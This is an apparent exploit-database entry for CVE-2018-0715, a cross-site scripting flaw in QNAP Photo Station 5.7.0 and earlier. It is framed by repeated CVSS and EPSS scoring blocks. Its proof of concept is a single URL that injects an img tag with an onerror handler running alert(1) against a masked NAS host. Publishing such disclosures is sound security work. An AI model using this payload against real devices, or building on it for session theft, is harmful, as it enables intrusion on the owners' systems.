4.3 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
6.3 Medium
AI Score
Confidence
High
0.006 Low
EPSS
Percentile
79.4%
# Exploit Title: QNAP Photo Station 5.7.0 - Cross-Site Scripting
# Google Dork: N/A
# Date: 2018-09-07
# Exploit Author: Mitsuaki (Mitch) Shiraishi - secureworks
# Vendor Homepage: https://www.qnap.com/ja-jp/security-advisory/nas-201808-23
# Software Link: N/A
# Version: QNAP Photo Station versions 5.7.0 and earlier
# Tested on: N/A
# CVE : CVE-2018-0715
# PoC:
https://***.***.***.***:8080/photo/abc/<img%20src%3Da.jpg%20onerror%3D%22alert(1)%22>.txt
4.3 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
6.3 Medium
AI Score
Confidence
High
0.006 Low
EPSS
Percentile
79.4%